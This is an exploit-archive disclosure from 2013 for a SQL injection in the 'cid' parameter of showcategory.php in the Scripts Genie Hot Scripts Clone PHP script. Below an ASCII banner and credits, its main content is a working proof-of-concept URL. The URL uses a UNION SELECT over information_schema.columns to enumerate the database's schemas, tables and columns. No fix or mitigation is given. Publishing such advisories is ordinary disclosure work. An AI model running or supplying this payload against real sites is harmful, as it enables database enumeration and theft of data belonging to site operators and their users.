Scripts Genie Hot Scripts Clone (showcategory.php, cid param)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Scripts Genie Hot Scripts Clone (showcategory.php, cid param) - SQL Injection Vulnerability
# Published : 2013-02-18
# Author :
# Previous Title : Cometchat Application - Multiple Vulnerabilities
# Next Title : Cometchat - Multiple Vulnerabilities

-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=-
+             Security Flaw            +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=-
+                         __     _     +
+ ___  ___  ___ _   _  /  ___| |_   +
+/ __|/ _ / __| | | |/  / / _  __|  +
+__   __/ (__| |_| / /  /  __/ |_   +
+|___/___|___|__,__ / ___|__|  +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-+
+Scripts Genie Hot Scripts Clone Script+
+  SQL Injection Vulnerability PoC     +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=+
+       Discovered by Easy Laster      +
+      Autor : Easy Laster             +
+       Date   :17.02.2013             +
+      Script:Scripts Genie            +
+        Hot Scripts Clone Script      +
+        scriptsgenie.com              +
+       Price  ::$1.75                 +
+      Language: PHP                   +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+              Vulnerability           +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+hutscripts/showcategory.php?cid=[SQLi]+
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+           Proof of Concept           +
+        Crawling the MYSQL Stack      +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
/hutscripts/showcategory.php?cid=21+uni
on+select+1,concat_ws(0x3a,table_schema
,table_name,column_name),3,4,5+from+inf
ormation_schema.columns+limit+180,1--+